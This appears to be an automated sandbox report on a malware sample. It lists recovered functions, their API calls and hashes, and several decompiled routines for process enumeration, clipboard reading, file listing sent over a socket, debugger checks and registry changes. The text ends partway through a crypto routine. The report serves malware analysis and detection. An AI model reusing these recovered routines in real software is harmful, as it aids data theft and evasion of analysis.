Instruction Fuzzy Hash: 5B610771640606AAFB24AF75CC86AA773A8EF08305F14002FF905D7282EB78ED54D769

Uniqueness

Uniqueness Score: -1.00%

Function 0040D211, Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON

Download Yara Rule

APIs

Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C

CreateToolhelp32Snapshot.KERNEL32 ref: 0040D231
Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
CloseHandle.KERNEL32(00000000), ref: 0040D3E9

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
String ID:
API String ID: 715332099-0
Opcode ID: 71b305a050fb6ff9cac642b07f25a1a89c1079984eaa90e557e86da1c3795d5c
Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
Opcode Fuzzy Hash: 71b305a050fb6ff9cac642b07f25a1a89c1079984eaa90e557e86da1c3795d5c
Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58

Uniqueness

Uniqueness Score: -1.00%

Function 0044A343, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A397
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A3E8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A4A8

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
Instruction ID: b8f74ff5e519f84a9dadc1d099471af389f48447beb5eaa2b6f47629cec96164
Opcode Fuzzy Hash: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
Instruction Fuzzy Hash: 8061C275980207ABFB289F25CD86B7A77A8EF04304F10807BE905C6681E77CDD61CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 105C7601, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E105C7601(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t41 =  *0x46a00c ^ _t70;
				_v8 =  *0x46a00c ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E105C0774(_t41);
					_pop(_t62);
				}
				E105C2D6E(_t67,  &_v804, 0, 0x50);
				E105C2D6E(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E105C0774(_t57);
				}
				return E105C0B89(_v8 ^ _t70);
			}

0x105c7601
0x105c7601
0x105c7601
0x105c7601
0x105c7611
0x105c7613
0x105c761b
0x105c761d
0x105c7620
0x105c7625
0x105c7625
0x105c7631
0x105c7644
0x105c7652
0x105c7658
0x105c765e
0x105c7664
0x105c766a
0x105c7670
0x105c7676
0x105c767c
0x105c7682
0x105c7688
0x105c768f
0x105c7696
0x105c769d
0x105c76a4
0x105c76ab
0x105c76b2
0x105c76b3
0x105c76bc
0x105c76c2
0x105c76c5
0x105c76cb
0x105c76d8
0x105c76e1
0x105c76ea
0x105c76f3
0x105c7701
0x105c7703
0x105c7718
0x105c7724
0x105c7727
0x105c772c
0x105c773b

APIs

IsDebuggerPresent.KERNEL32 ref: 105C76F9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 105C7703
UnhandledExceptionFilter.KERNEL32(?), ref: 105C7710

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e8602fbf54147ba671dba98f954c185c9be2e82cbb1f1d55874976700e670ad4
Instruction ID: 3b25ef76af1686d43c4c9feb25753f6d09d3aa0ca95b9e07ee82382003954278
Opcode Fuzzy Hash: e8602fbf54147ba671dba98f954c185c9be2e82cbb1f1d55874976700e670ad4
Instruction Fuzzy Hash: 3331B27490121D9BCB21DF68D989B8CBBB8FF48351F5042EAF41CA6260E7709B818F45

Uniqueness

Uniqueness Score: -1.00%

Function 00436793, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043688B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00436895
UnhandledExceptionFilter.KERNEL32(?), ref: 004368A2

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
Instruction ID: 5d9ea4708ef0fa84a544dc6c90c967fa764ee4a1b9fa1f4ccea9e64d0f0b82c3
Opcode Fuzzy Hash: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
Instruction Fuzzy Hash: 5B31D47490122DABCB21DF64DC8978DBBB8BF08351F5041EAE80CA7251EB749F858F49

Uniqueness

Uniqueness Score: -1.00%

Function 105BF438, Relevance: 4.5, APIs: 3, Instructions: 33
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E105BF438(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}

0x105bf446
0x105bf448
0x105bf455
0x105bf46a
0x105bf474
0x00000000
0x105bf47a
0x105bf46c
0x105bf459
0x105bf459
0x00000000
0x105bf459
0x105bf457
0x00000000

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,105BF0F1,00000034,00000000,00000200,?), ref: 105BF44D
CryptGenRandom.ADVAPI32(00000000,00000200,?,?,105BF0F1,00000034,00000000,00000200,?), ref: 105BF462
CryptReleaseContext.ADVAPI32(00000000,00000000,?,105BF0F1,00000034,00000000,00000200,?), ref: 105BF474

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction ID: dbbda19018b8fd617faf48aa4766738e4c8482730b8f096e5100fea56dc92dbd
Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction Fuzzy Hash: ACF06D31208310BAEB302F25AC08F473F5ADB85BE6F614535F348E50E5D6A3A8408798

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD9, Relevance: 4.5, APIs: 3, Instructions: 22clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 00409BDF
GetClipboardData.USER32 ref: 00409BEB
CloseClipboard.USER32(?,00409C74,004092D9,?,00000000,00000000), ref: 00409BF3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: c9e41d73b8ee8baeafd22f2e569e48e40bbb3502372004424e024307334bc33d
Instruction ID: 8fe6b2826689424b7bc62c1d4e27f3d4ac42e80e4ec2c38984a05695e355c6dc
Opcode Fuzzy Hash: c9e41d73b8ee8baeafd22f2e569e48e40bbb3502372004424e024307334bc33d
Instruction Fuzzy Hash: 88E08631648314BBD610AFA1DC09F9A7B94AB44BD3F050036FD05AA2D2DB74DD00C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 105CD9BC, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E105CD9BC(int _a4) {
				void* _t14;
				void* _t16;

				if(E105D3604(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E105CD9FD(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x105cd9c8
0x105cd9e4
0x105cd9e4
0x105cd9ed
0x105cd9f6

APIs

GetCurrentProcess.KERNEL32(00000000,?,105CD992,00000000,00468188,0000000C,105CDAA5,00000000,00000002,00000000), ref: 105CD9DD
TerminateProcess.KERNEL32(00000000,?,105CD992,00000000,00468188,0000000C,105CDAA5,00000000,00000002,00000000), ref: 105CD9E4
ExitProcess.KERNEL32 ref: 105CD9F6

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
Instruction ID: 8163091343e5a241c91fe6d3d9129da73e9b7d17e508aa8ade7a5b10ec492d37
Opcode Fuzzy Hash: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
Instruction Fuzzy Hash: D2E0B639000648ABCF016FA4DE5AA58BF6DFB51283F008068F8098A532CB35EE42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0043CB4E, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000,?,0043F98B,00000003), ref: 0043CB6F
TerminateProcess.KERNEL32(00000000,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000,?,0043F98B,00000003), ref: 0043CB76
ExitProcess.KERNEL32 ref: 0043CB88

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
Instruction ID: 9d9abcf2254aec220b88c5a41349a832f37ebcac6e9232ae025b4d2f02e95462
Opcode Fuzzy Hash: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
Instruction Fuzzy Hash: 56E0B631000748ABCF116F65ED4AA597F69FF59397F045069F9059A232CB39EE42CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00446AF9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 00446C8C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6555ea729f4bf320215ec20ed3e04cba7ec42d0553a22b02cf13516af4522b1d
Instruction ID: 902a4e4d1e087740e0a32b3358ab9b92e53e313bfb578708a00ec5a0f4c6ba11
Opcode Fuzzy Hash: 6555ea729f4bf320215ec20ed3e04cba7ec42d0553a22b02cf13516af4522b1d
Instruction Fuzzy Hash: CD313771800259AFDB248E79CC84EFBBBBDDF86318F0141AEF818D7251E634AE408B55

Uniqueness

Uniqueness Score: -1.00%

Function 105A8D7E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 105A8E73

Part of subcall function 105A1915: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 105A1924
Part of subcall function 105A1915: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,105A1B3B,?,00000000), ref: 105A194C
Part of subcall function 105A1915: RegCloseKey.ADVAPI32(00000000,?,?,?,105A1B3B,?,00000000), ref: 105A1957

Strings

Control Panel\Desktop, xrefs: 105A8DB9, 105A8DEC, 105A8E3C

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop
API String ID: 4127273184-27424756
Opcode ID: b0afdbb103ed09d5d1d4a2cadf036e284e3f1dbb9bd7c8f5390a811be432f2d6
Instruction ID: 63a61acb87644f6a84391f730910a34a2db1a8a44e2ee2d105071dbd16ada28d
Opcode Fuzzy Hash: b0afdbb103ed09d5d1d4a2cadf036e284e3f1dbb9bd7c8f5390a811be432f2d6
Instruction Fuzzy Hash: 0A11D632B80350B7E80431790D5BB7F2C19D397B91FA0015AFA012F6C6E9960A9983DB

Uniqueness

Uniqueness Score: -1.00%

Function 004423BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D

Strings

GetLocaleInfoEx, xrefs: 004423D5

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
Instruction ID: 96fabd543f80631915bdd4e6a3d78e1bd42830cecee988cc8e1c6fddece1edfb
Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
Instruction Fuzzy Hash: 89F0F631640318BBDB11AF61DC02F6E7F65EF04B02F50402AFC0567292CA799E259A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043FA50, Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
Instruction ID: 1c2153c09f84a79ea258590f09f89f50964c174f8247bd10d492af3eb38c561b
Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
Instruction Fuzzy Hash: E5022B71E002199FDF14CFA9C9806AEBBF1FF48314F25926AD919E7341D734AE458B84

Uniqueness

Uniqueness Score: -1.00%

Function 004153F5, Relevance: 3.2, APIs: 2, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Find$CreateFirstNextchar_traits
String ID:
API String ID: 3100282071-0
Opcode ID: fa562cbc9183c885f9c76a716ca056484cbc588be1d6239d27d27d4f318d7c3c
Instruction ID: fc299df16d418c96fbb3dc7ae8f09247cd9b87a8735511f9070920f35661dee3
Opcode Fuzzy Hash: fa562cbc9183c885f9c76a716ca056484cbc588be1d6239d27d27d4f318d7c3c
Instruction Fuzzy Hash: DB81A6311183409BC314F722C856EEF73A9AF91348F40453FF596671E2EF389A49CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 10597031, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10597031(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* __ebx;
				void* __esi;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t73;
				void* _t74;

				_t73 = FindFirstFileW(E10592D59( &_a4),  &_v668);
				_t77 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					E10592F43(_t49,  &_v28);
					E105950ED(_t49,  &_v52,  &(_v668.cFileName));
					_t71 = 0x45f800;
					_t29 = E10598352(__eflags);
					_t50 = _t29;
					E10592D5E();
					__eflags = _t29;
					if(__eflags != 0) {
						E10592E3F( &_v28, 0x45f800, _t73, E10592F19(_t50,  &_v52, 0x45f800, __eflags,  &_v668, 0x250));
						L5:
						E10592E35();
					}
					__eflags = FindNextFileW(_t73,  &_v668);
					if(__eflags != 0) {
						_t34 = E10592F19(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
						_t71 =  &_v28;
						E10592E3F( &_v28,  &_v28, _t73, E1059835E(_t50,  &_v52,  &_v28, __eflags, _t34));
						E10592E35();
						goto L5;
					}
					E10592F5A(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
					_push(0x50);
					E10595912(_t50, 0x46c2e8, _t71, __eflags);
					E10592E35();
				} else {
					E105A820A(_t49, _t74 - 0x18,  &_a4);
					_push(0x54);
					E10595912(_t49, 0x46c2e8,  &_a4, _t77);
				}
				return E10592D5E();
			}

0x10597052
0x10597054
0x10597057
0x1059707a
0x10597089
0x1059708e
0x10597095
0x1059709d
0x1059709f
0x105970a4
0x105970a6
0x105970c0
0x105970ff
0x105970ff
0x105970ff
0x10597112
0x10597114
0x105970d9
0x105970df
0x105970ef
0x105970f7
0x00000000
0x105970fc
0x1059711f
0x10597124
0x1059712b
0x10597133
0x10597059
0x10597061
0x10597066
0x1059706d
0x1059706d
0x10597145

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 1059704C
FindNextFileW.KERNEL32(00000000,?,?), ref: 1059710C

Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: 9fe72d86b66667744f21832d2d685f530abdb3f2653e1172f6bebf3ad72d57c5
Instruction ID: 6c5faafbfbc6f24ecd2d2bc168af15b285ffdb7e71e1a7053fc6934f1e6de0c5
Opcode Fuzzy Hash: 9fe72d86b66667744f21832d2d685f530abdb3f2653e1172f6bebf3ad72d57c5
Instruction Fuzzy Hash: CA215E39910118AACB04EBA0DC9EDFE7B3CEF95391F40066AB50667190EF307A49CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3, Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: ca6a976084f1de81ffd3886c8e04e897e3e1b7529020c15cd9257a060a587483
Instruction ID: 05b06413529d47d56342622e5ae20bd3e82c8e6dc30fd3fa753989dbabbba416
Opcode Fuzzy Hash: ca6a976084f1de81ffd3886c8e04e897e3e1b7529020c15cd9257a060a587483
Instruction Fuzzy Hash: 442198319102099ACB14FBA6CC96DEF7778AF55304F40017FF906761D2EF385A49CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0042E6D5, Relevance: 3.0, Strings: 2, Instructions: 504COMMON

Download Yara Rule

Strings

>B, xrefs: 0042E7C1, 0042E7CA, 0042E867, 0042E8DC, 0042E8FA, 0042E907, 0042E91C, 0042E922, 0042E9A3, 0042E9A9, 0042EA33, 0042EA8E, 0042EAD1, 0042EB93
0, xrefs: 0042E6E3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0$>B
API String ID: 0-1048847329
Opcode ID: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
Instruction ID: 01373311d30a08af49cfafd2a3fc4a279ee9ec8541b77b64949e3053e491237c
Opcode Fuzzy Hash: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
Instruction Fuzzy Hash: 00127332F002289BDF04DFA6D952AEDB3F2BF88314F65806AD505BB381DA756D419F84

Uniqueness

Uniqueness Score: -1.00%

Function 00422F55, Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

@, xrefs: 00422F9F
i2B, xrefs: 00423083

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$i2B
API String ID: 0-2200245087
Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction ID: 4af2ff7e78d49f183de830a94ea395cb586ad7855fff9f1f606cf8d5048b6b54
Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction Fuzzy Hash: F941FA76E102199BCB04CFA9D5817DEFBF1FF88310F25815AE905B3350D3B9AA818B94

Uniqueness

Uniqueness Score: -1.00%

Function 0044B5AB, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0044B5A6,?,?,00000008,?,?,0044FE0D,00000000), ref: 0044B7D8

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: cc85bae79cd5d03614b0cb5780008f5f07eaef1f5bffa362621243dd81b96db8
Instruction ID: 9f9410494d300a06119f87cf65079ac9d7e92874d2322b7088893299dd62e991
Opcode Fuzzy Hash: cc85bae79cd5d03614b0cb5780008f5f07eaef1f5bffa362621243dd81b96db8
Instruction Fuzzy Hash: E1B16E31510608DFE719CF28C486B657BE0FF45364F29865AE899CF3A1C739E992CB84

Uniqueness

Uniqueness Score: -1.00%

Function 105BF543, Relevance: 1.8, Strings: 1, Instructions: 504
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E105BF543(void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void _v72;
				void* _v76;
				void* _v276;
				void _v332;
				void* _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t294;
				intOrPtr _t295;
				unsigned int _t297;
				void* _t299;
				signed int _t301;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t415;
				void* _t422;
				void* _t423;
				void* _t424;
				void* _t425;
				void* _t426;
				void* _t433;
				void* _t434;
				void* _t435;
				void* _t436;
				void* _t437;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				signed int _t454;
				void* _t455;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				signed int _t465;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				signed int _t476;
				void* _t477;
				void* _t478;
				void* _t479;
				void* _t480;
				void* _t481;
				signed int _t487;
				void* _t506;
				void* _t513;
				void* _t520;
				void* _t527;
				void* _t534;
				void* _t541;
				void* _t548;
				void* _t555;
				unsigned int _t558;
				signed int _t563;
				signed int _t568;
				signed int _t573;
				signed int _t578;
				signed int _t583;
				signed int _t588;
				signed int _t593;
				signed int _t598;
				void* _t603;

				_t400 = __edx;
				_v12 = 0x30;
				_t301 = 8;
				_v76 = __ecx;
				memcpy( &_v72, __ecx, _t301 << 2);
				_push(0x10);
				_t204 = memcpy( &_v332, _t400, 0 << 2);
				_v40 = _t204;
				do {
					_t558 =  *_t204;
					_t297 =  *(_t204 - 0x34);
					_t401 = 0x13;
					_t205 = E105BF480(_t558, _t401);
					_t402 = 0x11;
					_t206 = E105BF480(_t558, _t402);
					_t403 = 0x12;
					_t207 = E105BF480(_t297, _t403);
